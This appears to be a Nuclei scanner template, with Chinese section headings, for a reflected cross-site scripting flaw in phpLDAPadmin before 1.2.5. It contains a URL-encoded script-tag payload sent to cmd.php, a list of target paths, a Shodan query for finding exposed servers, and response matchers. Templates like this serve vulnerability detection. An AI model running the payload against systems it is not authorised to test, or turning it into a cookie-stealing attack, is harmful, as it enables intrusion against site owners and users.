漏洞描述
PHP LDAP Admin is vulnerable to XSS.
phpldapadmin-xss: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
PoC代码[已公开]
id: phpldapadmin-xss
info:
name: PHP LDAP Admin < 1.2.5 - Cross-Site Scripting
author: GodfatherOrwa,herry
severity: medium
description: PHP LDAP Admin is vulnerable to XSS.
reference:
- https://twitter.com/GodfatherOrwa/status/1701392754251563477
classification:
cpe: cpe:2.3:a:phpldapadmin_project:phpldapadmin:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 9
vendor: phpldapadmin_project
product: phpldapadmin
shodan-query: html:"phpLDAPadmin"
tags: php,phpldapadmin,xss,vuln
http:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}{{path}}/cmd.php?cmd=template_engine&dn=%27%22()%26%25%3Czzz%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&meth=ajax&server_id=1"
- "{{BaseURL}}{{path}}/index.php?redirect=true&meth=ajax"
attack: pitchfork
payloads:
path:
- /
- /htdocs/index.php
- /phpldapadmin
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert(document.domain)</script>"
- "No such entry"
condition: and
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
# digest: 4a0a00473045022100d91d5486cceaae8776537f86f7d1cdebe06f2f98c97007f34823f4ee8864397402201096816543c86cf7e1d90faedb109679a17f55171d998057773c3e49a89cd60c:922c64590222798bb761d5b6d8e72950